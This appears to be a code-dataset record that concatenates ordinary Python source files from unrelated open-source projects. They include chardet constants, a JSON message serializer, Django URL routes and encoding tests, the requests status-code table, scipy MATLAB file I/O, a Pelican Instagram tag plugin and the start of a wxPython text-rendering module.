def fast_memoize_multiple_args(func):
f = cdict2(func).__getitem__
return lambda *args: f(args)
|
enitihas/SAC-Website
|
refs/heads/master
|
venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/constants.py
|
3007
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
_debug = 0
eDetecting = 0
eFoundIt = 1
eNotMe = 2
eStart = 0
eError = 1
eItsMe = 2
SHORTCUT_THRESHOLD = 0.95
|
mvaled/sentry
|
refs/heads/master
|
src/sentry/mediators/service_hooks/__init__.py
|
3
|
from __future__ import absolute_import
from .creator import Creator # NOQA
from .updater import Updater # NOQA
from .destroyer import Destroyer # NOQA
|
team-items/MissionControl-Server
|
refs/heads/master
|
lib/MIDaCSerializer.py
|
1
|
import json
#ENUM style class for easier comparison
class MSGType():
ConnREQ = 1
ConnACK = 2
ConnREJ = 3
ConnLAO = 4
ConnSTT = 5
ConnB = 6
#exception thrown when a message is not midac serializeable
class MIDaCSerializationException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return "MIDaC Serialization Exception for "+repr(self.value)
#Class used to create, compare and serialze midac messages
class MIDaCSerializer():
def GetMessageType(self, msg):
if type(msg) is str:
json.loads(msg)
if type(msg) is dict:
if "ConnLAO" in msg:
return MSGType.ConnLAO
if "ConnACK" in msg:
return MSGType.ConnACK
if "ConnREQ" in msg:
return MSGType.ConnREQ
if "ConnREJ" in msg:
return MSGType.ConnREJ
if "ConnSTT" in msg:
return MSGType.ConnSTT
if "B-Connect" in msg:
return MSGType.ConnB
else:
raise MIDaCSerializationException(msg)
def GenerateConnACK(self, crypto, size):
ConnACK = {"ConnACK" : {"ChosenCrypto" : crypto, "SegmentSize" : size}}
resultString = json.dumps(ConnACK)
return resultString+"\n"
def GenerateConnACK_B(self):
ConnACK = { "ConnACK" : ""}
return json.dumps(ConnACK)
def GenerateConnLAO(self, integers, floats, bools, strings, sliders, buttons):
ConnLAO = {"ConnLAO" : {
"Information" : {
"Integer" : integers,
"Float" : floats,
"Bool" : bools,
"String" : strings
},
"Control" : {
"Slider" : sliders,
"Button" : buttons
}
}
}
return json.dumps(ConnLAO)
def GenerateConnREJ(self, message):
ConnREJ = {"ConnREJ" : {"Error" : message}}
def GenerateIntegerLAO(self, name, minbound, maxbound, graph):
if graph is None:
IntLAO = {name : {
"DataType" : "Integer",
"MinBound" : minbound,
"MaxBound" : maxbound,
}
}
return IntLAO
else:
IntLAO = {name : {
"DataType" : "Integer",
"MinBound" : minbound,
"MaxBound" : maxbound,
"Graph" : graph
}
}
return IntLAO
def GenerateFloatLAO(self, name, minbound, maxbound, graph):
if graph is None:
FloatLAO = {name : {
"DataType" : "Float",
"MinBound" : minbound,
"MaxBound" : maxbound,
}
}
return FloatLAO
else:
FloatLAO = {name : {
"DataType" : "Float",
"MinBound" : minbound,
"MaxBound" : maxbound,
"Graph" : graph
}
}
return FloatLAO
def GenerateStringLAO(self, name, minlength, maxlength):
StringLAO = {name : {
"DataType" : "String",
"MinLength" : minlength,
"MaxBound" : maxlength,
}
}
return StringLAO
def GenerateBoolLAO(self, name):
BoolLAO = {name : {
"DataType" : "Bool"
}
}
return BoolLAO
def GenerateSliderLAO(self, name, maxbound, minbound):
SliderLAO = {name : {
"ControlType" : "Slider",
"MinBound" : minbound,
"MaxBound" : maxbound
}
}
return SliderLAO
def GenerateButtonLAO(self, name):
ButtonLAO = {name : {
"ControlType" : "Button"
}
}
return ButtonLAO
|
mrquim/mrquimrepo
|
refs/heads/master
|
repo/script.module.youtube.dl/lib/youtube_dl/__main__.py
|
90
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Execute with
# $ python youtube_dl/__main__.py (2.6+)
# $ python -m youtube_dl (2.7+)
import sys
if __package__ is None and not hasattr(sys, 'frozen'):
# direct call of __main__.py
import os.path
path = os.path.realpath(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(os.path.dirname(path)))
import youtube_dl
if __name__ == '__main__':
youtube_dl.main()
|
clsdaniel/iridium
|
refs/heads/master
|
scm/urls.py
|
1
|
# Copyright (c) 2009, Carlos Daniel Ruvalcaba Valenzuela
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Blackchair Software nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from django.conf.urls.defaults import *
urlpatterns = patterns('',
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/diff/(?P<cid>[\d\w]*)', 'iridium.scm.views.viewDiff'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/t/(?P<tree>[\d\w/]*)', 'iridium.scm.views.viewTree'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/cat/(?P<tree>[\d\w/\.]*)', 'iridium.scm.views.viewFile'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)/t', 'iridium.scm.views.viewTree'),
(r'(?P<pid>[\d\w]*)/(?P<rid>[\d\w]*)', 'iridium.scm.views.viewRepo'),
(r'(?P<pid>[\d\w]*)', 'iridium.scm.views.listRepos'),
)
|
nirmeshk/mase
|
refs/heads/master
|
python101/code/Time2_soln.py
|
14
|
"""
Code example from Think Python, by Allen B. Downey.
Available from http://thinkpython.com
Copyright 2012 Allen B. Downey.
Distributed under the GNU General Public License at gnu.org/licenses/gpl.html.
"""
class Time(object):
"""Represents the time of day.
attributes: hour, minute, second
"""
def __init__(self, hour=0, minute=0, second=0):
minutes = hour * 60 + minute
self.seconds = minutes * 60 + second
def __str__(self):
minutes, second = divmod(self.seconds, 60)
hour, minute = divmod(minutes, 60)
return '%.2d:%.2d:%.2d' % (hour, minute, second)
def print_time(self):
print str(self)
def time_to_int(self):
"""Computes the number of seconds since midnight."""
return self.seconds
def is_after(self, other):
"""Returns True if t1 is after t2; false otherwise."""
return self.seconds > other.seconds
def __add__(self, other):
"""Adds two Time objects or a Time object and a number.
other: Time object or number of seconds
"""
if isinstance(other, Time):
return self.add_time(other)
else:
return self.increment(other)
def __radd__(self, other):
"""Adds two Time objects or a Time object and a number."""
return self.__add__(other)
def add_time(self, other):
"""Adds two time objects."""
assert self.is_valid() and other.is_valid()
seconds = self.seconds + other.seconds
return int_to_time(seconds)
def increment(self, seconds):
"""Returns a new Time that is the sum of this time and seconds."""
seconds += self.seconds
return int_to_time(seconds)
def is_valid(self):
"""Checks whether a Time object satisfies the invariants."""
return self.seconds >= 0 and self.seconds < 24*60*60
def int_to_time(seconds):
"""Makes a new Time object.
seconds: int seconds since midnight.
"""
return Time(0, 0, seconds)
def main():
start = Time(9, 45, 00)
start.print_time()
end = start.increment(1337)
end.print_time()
print 'Is end after start?',
print end.is_after(start)
print 'Using __str__'
print start, end
start = Time(9, 45)
duration = Time(1, 35)
print start + duration
print start + 1337
print 1337 + start
print 'Example of polymorphism'
t1 = Time(7, 43)
t2 = Time(7, 41)
t3 = Time(7, 37)
total = sum([t1, t2, t3])
print total
if __name__ == '__main__':
main()
|
hbarghi/VirtualBattery1
|
refs/heads/master
|
src/virtual-net-device/bindings/callbacks_list.py
|
127
|
callback_classes = [
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::Packet>', 'ns3::Address const&', 'ns3::Address const&', 'unsigned short', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
|
PegasusWang/pyhome
|
refs/heads/master
|
crawler/sougou_wechat/_env.py
|
10
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
from os.path import abspath, dirname, join
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
PREFIX = abspath(join(dirname(abspath(__file__)), '../'))
PARENT = abspath(join(dirname(abspath(__file__)), '../../'))
if PREFIX not in sys.path:
sys.path.append(PREFIX)
sys.path.append(PARENT)
|
tayfun/django
|
refs/heads/master
|
tests/utils_tests/test_encoding.py
|
288
|
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import unittest
from django.utils import six
from django.utils.encoding import (
escape_uri_path, filepath_to_uri, force_bytes, force_text, iri_to_uri,
smart_text, uri_to_iri,
)
from django.utils.functional import SimpleLazyObject
from django.utils.http import urlquote_plus
class TestEncodingUtils(unittest.TestCase):
def test_force_text_exception(self):
"""
Check that broken __unicode__/__str__ actually raises an error.
"""
class MyString(object):
def __str__(self):
return b'\xc3\xb6\xc3\xa4\xc3\xbc'
__unicode__ = __str__
# str(s) raises a TypeError on python 3 if the result is not a text type.
# python 2 fails when it tries converting from str to unicode (via ASCII).
exception = TypeError if six.PY3 else UnicodeError
self.assertRaises(exception, force_text, MyString())
def test_force_text_lazy(self):
s = SimpleLazyObject(lambda: 'x')
self.assertTrue(issubclass(type(force_text(s)), six.text_type))
def test_force_bytes_exception(self):
"""
Test that force_bytes knows how to convert to bytes an exception
containing non-ASCII characters in its args.
"""
error_msg = "This is an exception, voilà"
exc = ValueError(error_msg)
result = force_bytes(exc)
self.assertEqual(result, error_msg.encode('utf-8'))
def test_force_bytes_strings_only(self):
today = datetime.date.today()
self.assertEqual(force_bytes(today, strings_only=True), today)
def test_smart_text(self):
class Test:
if six.PY3:
def __str__(self):
return 'ŠĐĆŽćžšđ'
else:
def __str__(self):
return 'ŠĐĆŽćžšđ'.encode('utf-8')
class TestU:
if six.PY3:
def __str__(self):
return 'ŠĐĆŽćžšđ'
def __bytes__(self):
return b'Foo'
else:
def __str__(self):
return b'Foo'
def __unicode__(self):
return '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
self.assertEqual(smart_text(Test()), '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111')
self.assertEqual(smart_text(TestU()), '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111')
self.assertEqual(smart_text(1), '1')
self.assertEqual(smart_text('foo'), 'foo')
class TestRFC3987IEncodingUtils(unittest.TestCase):
def test_filepath_to_uri(self):
self.assertEqual(filepath_to_uri('upload\\чубака.mp4'),
'upload/%D1%87%D1%83%D0%B1%D0%B0%D0%BA%D0%B0.mp4')
self.assertEqual(filepath_to_uri('upload\\чубака.mp4'.encode('utf-8')),
'upload/%D1%87%D1%83%D0%B1%D0%B0%D0%BA%D0%B0.mp4')
def test_iri_to_uri(self):
cases = [
# Valid UTF-8 sequences are encoded.
('red%09rosé#red', 'red%09ros%C3%A9#red'),
('/blog/for/Jürgen Münster/', '/blog/for/J%C3%BCrgen%20M%C3%BCnster/'),
('locations/%s' % urlquote_plus('Paris & Orléans'), 'locations/Paris+%26+Orl%C3%A9ans'),
# Reserved chars remain unescaped.
('%&', '%&'),
('red&♥ros%#red', 'red&%E2%99%A5ros%#red'),
]
for iri, uri in cases:
self.assertEqual(iri_to_uri(iri), uri)
# Test idempotency.
self.assertEqual(iri_to_uri(iri_to_uri(iri)), uri)
def test_uri_to_iri(self):
cases = [
# Valid UTF-8 sequences are decoded.
('/%E2%99%A5%E2%99%A5/', '/♥♥/'),
('/%E2%99%A5%E2%99%A5/?utf8=%E2%9C%93', '/♥♥/?utf8=✓'),
# Broken UTF-8 sequences remain escaped.
('/%AAd%AAj%AAa%AAn%AAg%AAo%AA/', '/%AAd%AAj%AAa%AAn%AAg%AAo%AA/'),
('/%E2%99%A5%E2%E2%99%A5/', '/♥%E2♥/'),
('/%E2%99%A5%E2%99%E2%99%A5/', '/♥%E2%99♥/'),
('/%E2%E2%99%A5%E2%99%A5%99/', '/%E2♥♥%99/'),
('/%E2%99%A5%E2%99%A5/?utf8=%9C%93%E2%9C%93%9C%93', '/♥♥/?utf8=%9C%93✓%9C%93'),
]
for uri, iri in cases:
self.assertEqual(uri_to_iri(uri), iri)
# Test idempotency.
self.assertEqual(uri_to_iri(uri_to_iri(uri)), iri)
def test_complementarity(self):
cases = [
('/blog/for/J%C3%BCrgen%20M%C3%BCnster/', '/blog/for/J\xfcrgen M\xfcnster/'),
('%&', '%&'),
('red&%E2%99%A5ros%#red', 'red&♥ros%#red'),
('/%E2%99%A5%E2%99%A5/', '/♥♥/'),
('/%E2%99%A5%E2%99%A5/?utf8=%E2%9C%93', '/♥♥/?utf8=✓'),
('/%AAd%AAj%AAa%AAn%AAg%AAo%AA/', '/%AAd%AAj%AAa%AAn%AAg%AAo%AA/'),
('/%E2%99%A5%E2%E2%99%A5/', '/♥%E2♥/'),
('/%E2%99%A5%E2%99%E2%99%A5/', '/♥%E2%99♥/'),
('/%E2%E2%99%A5%E2%99%A5%99/', '/%E2♥♥%99/'),
('/%E2%99%A5%E2%99%A5/?utf8=%9C%93%E2%9C%93%9C%93', '/♥♥/?utf8=%9C%93✓%9C%93'),
]
for uri, iri in cases:
self.assertEqual(iri_to_uri(uri_to_iri(uri)), uri)
self.assertEqual(uri_to_iri(iri_to_uri(iri)), iri)
def test_escape_uri_path(self):
self.assertEqual(
escape_uri_path('/;some/=awful/?path/:with/@lots/&of/+awful/chars'),
'/%3Bsome/%3Dawful/%3Fpath/:with/@lots/&of/+awful/chars'
)
self.assertEqual(escape_uri_path('/foo#bar'), '/foo%23bar')
self.assertEqual(escape_uri_path('/foo?bar'), '/foo%3Fbar')
|
JeyZeta/Dangerous
|
refs/heads/master
|
Dangerous/TheHarvester/requests-2.9.1/requests/status_codes.py
|
202
|
# -*- coding: utf-8 -*-
from .structures import LookupDict
_codes = {
# Informational.
100: ('continue',),
101: ('switching_protocols',),
102: ('processing',),
103: ('checkpoint',),
122: ('uri_too_long', 'request_uri_too_long'),
200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
201: ('created',),
202: ('accepted',),
203: ('non_authoritative_info', 'non_authoritative_information'),
204: ('no_content',),
205: ('reset_content', 'reset'),
206: ('partial_content', 'partial'),
207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
208: ('already_reported',),
226: ('im_used',),
# Redirection.
300: ('multiple_choices',),
301: ('moved_permanently', 'moved', '\\o-'),
302: ('found',),
303: ('see_other', 'other'),
304: ('not_modified',),
305: ('use_proxy',),
306: ('switch_proxy',),
307: ('temporary_redirect', 'temporary_moved', 'temporary'),
308: ('permanent_redirect',
'resume_incomplete', 'resume',), # These 2 to be removed in 3.0
# Client Error.
400: ('bad_request', 'bad'),
401: ('unauthorized',),
402: ('payment_required', 'payment'),
403: ('forbidden',),
404: ('not_found', '-o-'),
405: ('method_not_allowed', 'not_allowed'),
406: ('not_acceptable',),
407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
408: ('request_timeout', 'timeout'),
409: ('conflict',),
410: ('gone',),
411: ('length_required',),
412: ('precondition_failed', 'precondition'),
413: ('request_entity_too_large',),
414: ('request_uri_too_large',),
415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
417: ('expectation_failed',),
418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
422: ('unprocessable_entity', 'unprocessable'),
423: ('locked',),
424: ('failed_dependency', 'dependency'),
425: ('unordered_collection', 'unordered'),
426: ('upgrade_required', 'upgrade'),
428: ('precondition_required', 'precondition'),
429: ('too_many_requests', 'too_many'),
431: ('header_fields_too_large', 'fields_too_large'),
444: ('no_response', 'none'),
449: ('retry_with', 'retry'),
450: ('blocked_by_windows_parental_controls', 'parental_controls'),
451: ('unavailable_for_legal_reasons', 'legal_reasons'),
499: ('client_closed_request',),
# Server Error.
500: ('internal_server_error', 'server_error', '/o\\', '✗'),
501: ('not_implemented',),
502: ('bad_gateway',),
503: ('service_unavailable', 'unavailable'),
504: ('gateway_timeout',),
505: ('http_version_not_supported', 'http_version'),
506: ('variant_also_negotiates',),
507: ('insufficient_storage',),
509: ('bandwidth_limit_exceeded', 'bandwidth'),
510: ('not_extended',),
511: ('network_authentication_required', 'network_auth', 'network_authentication'),
}
codes = LookupDict(name='status_codes')
for code, titles in _codes.items():
for title in titles:
setattr(codes, title, code)
if not title.startswith('\\'):
setattr(codes, title.upper(), code)
|
scipy/scipy-svn
|
refs/heads/master
|
scipy/io/matlab/mio.py
|
4
|
"""Module for reading and writing MATLAB .mat files"""
# Authors: Travis Oliphant, Matthew Brett
"""
Module for reading and writing matlab (TM) .mat files
"""
import os
import sys
import warnings
from numpy.compat import asbytes
from miobase import get_matfile_version, docfiller
from mio4 import MatFile4Reader, MatFile4Writer
from mio5 import MatFile5Reader, MatFile5Writer
__all__ = ['find_mat_file', 'mat_reader_factory', 'loadmat', 'savemat']
@docfiller
def find_mat_file(file_name, appendmat=True):
''' Try to find .mat file on system path
Parameters
----------
file_name : str
file name for mat file
%(append_arg)s
Returns
-------
full_name : string
possibly modified name after path search
'''
warnings.warn('Searching for mat files on python system path will be ' +
'removed in next version of scipy',
DeprecationWarning, stacklevel=2)
if appendmat and file_name.endswith(".mat"):
file_name = file_name[:-4]
if os.sep in file_name:
full_name = file_name
if appendmat:
full_name = file_name + ".mat"
else:
full_name = None
junk, file_name = os.path.split(file_name)
for path in [os.curdir] + list(sys.path):
test_name = os.path.join(path, file_name)
if appendmat:
test_name += ".mat"
try:
fid = open(test_name,'rb')
fid.close()
full_name = test_name
break
except IOError:
pass
return full_name
def _open_file(file_like, appendmat):
''' Open `file_like` and return as file-like object '''
if isinstance(file_like, basestring):
try:
return open(file_like, 'rb')
except IOError:
pass
if appendmat and not file_like.endswith('.mat'):
try:
return open(file_like + '.mat', 'rb')
except IOError:
pass
# search the python path - we'll remove this soon
full_name = find_mat_file(file_like, appendmat)
if full_name is None:
raise IOError("%s not found on the path."
% file_like)
return open(full_name, 'rb')
# not a string - maybe file-like object
try:
file_like.read(0)
except AttributeError:
raise IOError('Reader needs file name or open file-like object')
return file_like
@docfiller
def mat_reader_factory(file_name, appendmat=True, **kwargs):
"""Create reader for matlab .mat format files
Parameters
----------
%(file_arg)s
%(append_arg)s
%(load_args)s
%(struct_arg)s
Returns
-------
matreader : MatFileReader object
Initialized instance of MatFileReader class matching the mat file
type detected in `filename`.
"""
byte_stream = _open_file(file_name, appendmat)
mjv, mnv = get_matfile_version(byte_stream)
if mjv == 0:
return MatFile4Reader(byte_stream, **kwargs)
elif mjv == 1:
return MatFile5Reader(byte_stream, **kwargs)
elif mjv == 2:
raise NotImplementedError('Please use HDF reader for matlab v7.3 files')
else:
raise TypeError('Did not recognize version %s' % mjv)
@docfiller
def loadmat(file_name, mdict=None, appendmat=True, **kwargs):
"""
Load MATLAB file
Parameters
----------
%(file_arg)s
m_dict : dict, optional
Dictionary in which to insert matfile variables.
%(append_arg)s
%(load_args)s
%(struct_arg)s
variable_names : None or sequence
If None (the default) - read all variables in file. Otherwise
`variable_names` should be a sequence of strings, giving names of the
matlab variables to read from the file. The reader will skip any
variable with a name not in this sequence, possibly saving some read
processing.
Returns
-------
mat_dict : dict
dictionary with variable names as keys, and loaded matrices as
values
Notes
-----
v4 (Level 1.0), v6 and v7 to 7.2 matfiles are supported.
You will need an HDF5 python library to read matlab 7.3 format mat
files. Because scipy does not supply one, we do not implement the
HDF5 / 7.3 interface here.
"""
variable_names = kwargs.pop('variable_names', None)
MR = mat_reader_factory(file_name, appendmat, **kwargs)
matfile_dict = MR.get_variables(variable_names)
if mdict is not None:
mdict.update(matfile_dict)
else:
mdict = matfile_dict
if isinstance(file_name, basestring):
MR.mat_stream.close()
return mdict
@docfiller
def savemat(file_name, mdict,
appendmat=True,
format='5',
long_field_names=False,
do_compression=False,
oned_as=None):
"""
Save a dictionary of names and arrays into a MATLAB-style .mat file.
This saves the array objects in the given dictionary to a MATLAB-
style .mat file.
Parameters
----------
file_name : str or file-like object
Name of the .mat file (.mat extension not needed if ``appendmat ==
True``).
Can also pass open file_like object.
m_dict : dict
Dictionary from which to save matfile variables.
%(append_arg)s
format : {'5', '4'}, string, optional
'5' (the default) for MATLAB 5 and up (to 7.2),
'4' for MATLAB 4 .mat files
%(long_fields)s
%(do_compression)s
%(oned_as)s
See also
--------
mio4.MatFile4Writer
mio5.MatFile5Writer
Notes
-----
If ``format == '4'``, `mio4.MatFile4Writer` is called, which sets
`oned_as` to 'row' if it had been None. If ``format == '5'``,
`mio5.MatFile5Writer` is called, which sets `oned_as` to 'column' if
it had been None, but first it executes:
``warnings.warn("Using oned_as default value ('column')" +``
``" This will change to 'row' in future versions",``
``FutureWarning, stacklevel=2)``
without being more specific as to precisely when the change will take
place.
"""
file_is_string = isinstance(file_name, basestring)
if file_is_string:
if appendmat and file_name[-4:] != ".mat":
file_name = file_name + ".mat"
file_stream = open(file_name, 'wb')
else:
try:
file_name.write(asbytes(''))
except AttributeError:
raise IOError('Writer needs file name or writeable '
'file-like object')
file_stream = file_name
if format == '4':
if long_field_names:
raise ValueError("Long field names are not available for version 4 files")
MW = MatFile4Writer(file_stream, oned_as)
elif format == '5':
MW = MatFile5Writer(file_stream,
do_compression=do_compression,
unicode_strings=True,
long_field_names=long_field_names,
oned_as=oned_as)
else:
raise ValueError("Format should be '4' or '5'")
MW.put_variables(mdict)
if file_is_string:
file_stream.close()
|
olgabrani/synnefo
|
refs/heads/feature-newui-pithos
|
snf-pithos-backend/pithos/__init__.py
|
70
|
# Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# this is a namespace package
try:
import pkg_resources
pkg_resources.declare_namespace(__name__)
except ImportError:
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
|
40423143/2017springcd_hw
|
refs/heads/gh-pages
|
plugin/liquid_tags/gram.py
|
271
|
"""
Instagram Image Tag
-------------------
By `Tom Spalding <https://github.com/digitalvapor>`_
You can see a working example at `antivapor.net/instagram-tag.html <http://antivapor.net/instagram-tag.html>`_.
Based on `Liquid Image Tag <https://github.com/getpelican/pelican-plugins/blob/master/liquid_tags/img.py>`_ by `Jake Vanderplas <https://github.com/jakevdp>`_.
Optional Todo:
* Query JSON to automatically include descriptions.
http://api.instagram.com/oembed?url=http://instagr.am/p/olw8jXiz1_/
and option to add wrapping anchor link to original http://instagram.com/p/olw8jXiz1_
* Default to size m
http://instagr.am/p/olw8jXiz1_/media/?size=t
http://instagr.am/p/olw8jXiz1_/media
* Provide examples using with [Better Figures and Images](https://github.com/getpelican/pelican-plugins/tree/master/better_figures_and_images).
Syntax
------
{% gram shortcode [size] [width] [class name(s)] [title text | "title text" ["alt text"]] %}
where size is t, m, or l, and it defaults to m. see http://instagram.com/developer/embedding.
Examples
--------
{% gram pFG7naIZkr t %}
{% gram pFJE11IZnx %}
{% gram pFI0CAIZna l 400 figure 'pretty turkey tail fungus' %}
{% gram rOru21oZpe l 450 test_class instagram 'warehouse window title' 'alt text' %}
Output
------
<img src="http://photos-c.ak.instagram.com/hphotos-ak-xaf1/t51.2885-15/917172_604907902963826_254280879_n.jpg" width="450" title="warehouse window title" alt="alt text" class="test_class instagram">
"""
import re
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
from .mdx_liquid_tags import LiquidTags
SYNTAX = '{% gram shortcode [size] [width] [class name(s)] [title text | "title text" ["alt text"]] %}'
# Regular expression for full syntax
# ReGram = re.compile("""(?P<shortcode>\S+)(?:\s+(?P<size>[tml]?))?(?:\s+(?P<width>\d*))?(?:\s+(?P<class>\S*))?(?P<title>\s+.+)?""")
ReGram = re.compile("""(?P<shortcode>\S+)(?:\s+(?P<size>[tml]?))?(?:\s+(?P<width>\d*))?(?:\s+(?P<class>[^']*))?(?P<title>.+)?""")
# Regular expression to split the title and alt text
ReTitleAlt = re.compile("""(?:"|')(?P<title>[^"']+)?(?:"|')\s+(?:"|')(?P<alt>[^"']+)?(?:"|')""")
@LiquidTags.register('gram')
def gram(preprocessor, tag, markup):
attrs = None
# Parse the markup string
match = ReGram.search(markup)
if match:
attrs = dict([(key, val.strip())
for (key, val) in match.groupdict().items() if val])
else:
raise ValueError('Error processing input. '
'Expected syntax: {0}'.format(SYNTAX))
# Construct URI
#print(attrs)
shortcode = attrs['shortcode']
url = 'http://instagr.am/p/'+shortcode+'/media/'
del attrs['shortcode']
if 'size' in attrs:
size = '?size={0}'.format(attrs['size'])
url = url+size
del attrs['size']
r = urlopen(url)
if(r.getcode()==404):
raise ValueError('%s isnt a photo.'%shortcode)
gram_url = r.geturl()
# Check if alt text is present -- if so, split it from title
if 'title' in attrs:
match = ReTitleAlt.search(attrs['title'])
if match:
attrs.update(match.groupdict())
if not attrs.get('alt'):
attrs['alt'] = attrs['title']
#print('updated dict: '+repr(attrs))
# Return the formatted text
return '<img src="{0}"{1}>'.format(gram_url,' '.join(' {0}="{1}"'.format(key,val) for (key,val) in attrs.items()))
#----------------------------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register
|
163gal/Time-Line
|
refs/heads/master
|
libs64/wx/lib/fancytext.py
|
6
|
# 12/02/2003 - Jeff Grimmett ([email protected])
#
# o Updated for 2.5 compatability.
#
"""
FancyText -- methods for rendering XML specified text
This module exports four main methods::
def GetExtent(str, dc=None, enclose=True)
def GetFullExtent(str, dc=None, enclose=True)
def RenderToBitmap(str, background=None, enclose=True)
def RenderToDC(str, dc, x, y, enclose=True)
In all cases, 'str' is an XML string. Note that start and end tags are
only required if *enclose* is set to False. In this case the text
should be wrapped in FancyText tags.
In addition, the module exports one class::
class StaticFancyText(self, window, id, text, background, ...)
This class works similar to StaticText except it interprets its text
as FancyText.
The text can support superscripts and subscripts, text in different
sizes, colors, styles, weights and families. It also supports a
limited set of symbols, currently *times*, *infinity*, *angle* as well
as greek letters in both upper case (*Alpha* *Beta*... *Omega*) and
lower case (*alpha* *beta*... *omega*).
>>> frame = wx.Frame(wx.NULL, -1, "FancyText demo", wx.DefaultPosition)
>>> sft = StaticFancyText(frame, -1, testText, wx.Brush("light grey", wx.SOLID))
>>> frame.SetClientSize(sft.GetSize())
>>> didit = frame.Show()
>>> from guitest import PauseTests; PauseTests()
"""
# Copyright 2001-2003 Timothy Hochberg
# Use as you see fit. No warantees, I cannot be held responsible, etc.
import copy
import math
import sys
import wx
import xml.parsers.expat
__all__ = "GetExtent", "GetFullExtent", "RenderToBitmap", "RenderToDC", "StaticFancyText"
if sys.platform == "win32":
_greekEncoding = str(wx.FONTENCODING_CP1253)
else:
_greekEncoding = str(wx.FONTENCODING_ISO8859_7)
_families = {"fixed" : wx.FIXED, "default" : wx.DEFAULT, "decorative" : wx.DECORATIVE, "roman" : wx.ROMAN,
"script" : wx.SCRIPT, "swiss" : wx.SWISS, "modern" : wx.MODERN}
_styles = {"normal" : wx.NORMAL, "slant" : wx.SLANT, "italic" : wx.ITALIC}
